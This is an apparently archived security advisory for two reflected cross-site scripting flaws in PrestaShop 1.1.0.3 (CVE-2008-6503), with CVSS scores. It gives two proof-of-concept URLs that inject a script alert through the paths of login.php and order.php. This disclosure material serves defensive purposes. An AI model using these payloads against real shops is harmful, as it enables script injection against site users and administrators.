Two XSS Flaws in PrestaShop 1.1.0.3

2009.03.21

Credit: th3 r00k i

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-6503

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Affects PrestaShop 1.1.0.3
product: homepage: http://prestashop.com
This is XSS in the URI of PrestaShop. Trust no one, not even your $_SERVER[PHP_SELF] .
http://10.1.1.155/prestashop_1.1.0.3/admin/login.php/%22%3Cscript%3Ealer
t(1)%3C/script%3E
Add an item to the shoping cart and then vist this url:
http://10.1.1.155/Audit/Commerce/prestashop_1.1.0.3/order.php/%22%3Cscri
pt%3Ealert(1)%3C/script%3E
Peace

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Two XSS Flaws in PrestaShop 1.1.0.3

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.